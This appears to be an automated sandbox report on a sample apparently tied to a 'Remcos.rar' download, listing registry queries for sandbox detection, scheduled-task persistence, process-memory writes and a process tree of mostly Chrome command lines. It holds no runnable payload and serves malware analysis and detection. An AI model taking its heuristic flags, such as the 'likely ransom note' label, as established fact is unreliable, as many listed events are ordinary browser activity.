d8fce9dd9c65ca143343f7711859a7cffc3c5e656a8b84108183fb769a12ed8b

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	Taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	Taskmgr.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
5704	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133842823868000044"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3631479862-3805289613-2119427761-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3631479862-3805289613-2119427761-1000\{E8A2EB11-A503-47B7-A3C2-0454FBF3B110}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3631479862-3805289613-2119427761-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3631479862-3805289613-2119427761-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask	Taskmgr.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Remcos.rar:Zone.Identifier	chrome.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3000	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3000	schtasks.exe
4464	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3484	chrome.exe
3484	chrome.exe
4132	chrome.exe
4132	chrome.exe
4132	chrome.exe
4132	chrome.exe
3716	conhost.exe
3716	conhost.exe
2356	powershell.exe
2356	powershell.exe
2356	powershell.exe
5876	powershell.exe
5876	powershell.exe
5876	powershell.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
5708	conhost.exe
5708	conhost.exe
5708	conhost.exe
5044	powershell.exe
5044	powershell.exe
5044	powershell.exe
6136	powershell.exe
6136	powershell.exe
6136	powershell.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4020	Taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: 33	6012	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	6012	AUDIODG.EXE
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe
Token: SeShutdownPrivilege	3484	chrome.exe
Token: SeCreatePagefilePrivilege	3484	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
3484	chrome.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe
4020	Taskmgr.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe
5860	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 792 wrote to memory of 3000	792	cmd.exe	84
PID 792 wrote to memory of 3000	792	cmd.exe	84
PID 3484 wrote to memory of 496	3484	chrome.exe	92
PID 3484 wrote to memory of 496	3484	chrome.exe	92
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 3692	3484	chrome.exe	93
PID 3484 wrote to memory of 2528	3484	chrome.exe	94
PID 3484 wrote to memory of 2528	3484	chrome.exe	94
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95
PID 3484 wrote to memory of 1948	3484	chrome.exe	95

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\test.txt
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:792
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\test.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3000

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OEUzRDgwQjgtNEVDRi00QkUwLUE1NzUtQTkxNEU2MDgzQjg3fSIgdXNlcmlkPSJ7MkQzNUEyMEQtRDVDNi00RjJELUJBNUItMDlBMTAwQkM0NzJEfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7NEY4OEFBQjgtNzc5Qy00ODNCLUI4RDYtNTBFMEFENTU5Njc5fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjciIGluc3RhbGxkYXRldGltZT0iMTczOTE4MzcyMyIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNjU1NTQ5Njc0MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjQ3MzUxOTY4OTgiLz48L2FwcD48L3JlcXVlc3Q-
1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa6e0fcc40,0x7ffa6e0fcc4c,0x7ffa6e0fcc58
  2⤵
  PID:496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=1936 /prefetch:2
  2⤵
  PID:3692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1768,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=1912 /prefetch:3
  2⤵
  PID:2528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2204,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=2216 /prefetch:8
  2⤵
  PID:1948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3180 /prefetch:1
  2⤵
  PID:2084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:5156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3556,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4464 /prefetch:1
  2⤵
  PID:3540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3528,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4296 /prefetch:8
  2⤵
  PID:4056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3792,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4428 /prefetch:8
  2⤵
  PID:5900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4364,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3756 /prefetch:8
  2⤵
  PID:3232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4588,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4640 /prefetch:8
  2⤵
  PID:1012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5004,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3756 /prefetch:1
  2⤵
  PID:3412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3420,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:3368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3360,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3368 /prefetch:8
  2⤵
  PID:6040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5096,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=5100 /prefetch:8
  2⤵
  - Modifies registry class
  PID:1144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5204,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=5272 /prefetch:8
  2⤵
  PID:5236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5236,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=5452 /prefetch:1
  2⤵
  PID:1836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5500,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=5928 /prefetch:1
  2⤵
  PID:4748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6060,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=6052 /prefetch:1
  2⤵
  PID:5716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6248,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=6236 /prefetch:8
  2⤵
  PID:2160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6364,i,13353779891312486714,3785206375674265149,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=6376 /prefetch:8
  2⤵
  PID:6072
